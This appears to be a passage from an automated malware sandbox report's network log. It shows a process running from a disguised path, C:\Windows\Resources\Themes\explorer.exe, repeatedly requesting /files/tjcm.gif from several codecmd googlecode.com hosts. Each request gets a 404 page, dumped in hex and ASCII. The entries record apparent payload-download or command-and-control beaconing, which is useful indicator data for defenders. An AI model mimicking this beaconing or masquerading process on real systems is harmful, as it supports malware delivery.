                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:02.390683889 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.651181142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:03.989898920 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:04.649612904 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:04 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:04.649677038 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.651182172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:05.623330116 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:06.239308119 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:06 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:06.239324093 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:06.243462086 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.651183108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:07.031204939 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:07.757958889 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:07 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:07.757976055 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.651185142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:08.629743099 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:09.332309961 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:09 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:09.334065914 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.651186172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:10.069782019 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:10.635104895 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:10 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:10.635287046 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.651187108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:11.597775936 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:12.315287113 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:12 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:12.315311909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.651188142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:12.908399105 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:13.627109051 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:13 GMT
